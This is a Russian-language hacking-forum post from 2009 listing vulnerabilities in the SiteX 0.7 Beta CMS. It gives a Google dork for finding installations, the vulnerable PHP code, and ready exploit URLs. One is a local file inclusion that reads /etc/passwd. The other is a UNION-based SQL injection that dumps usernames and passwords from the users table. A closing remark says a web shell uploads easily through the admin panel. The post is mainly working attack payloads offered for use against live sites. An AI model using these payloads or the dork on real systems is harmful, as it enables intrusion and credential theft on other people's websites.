15.04.2009, 12:56
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Обзор Уязвимостей SiteX
Уязвимости SiteX 0.7 Beta
download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip
dork: "Powered by SiteX 0.7 Beta"
(выдачу гугла больше 10 линков не ставьте  )
1) [LFI] (требования: magic_quotes=off, register_globals=on)
/themes/Corporate/homepage.php
уязвимый код:
PHP код:
include("themes/$THEME_FOLDER/header.php");
эксплуатирование:
Код:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00
2) [SQL-injection] (требования: magic_quotes=off, register_globals=on)
links.php
уязвимый код:
PHP код:
if($category)
{
$query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'";
$result = mysql_query($query, $Link) or queryError("8", mysql_error());
эксплуатирование:
Код:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+
P.S:
шелл в админке аплоадится без проблем
Последний раз редактировалось Iceangel_; 15.04.2009 в 13:23..
|
|
|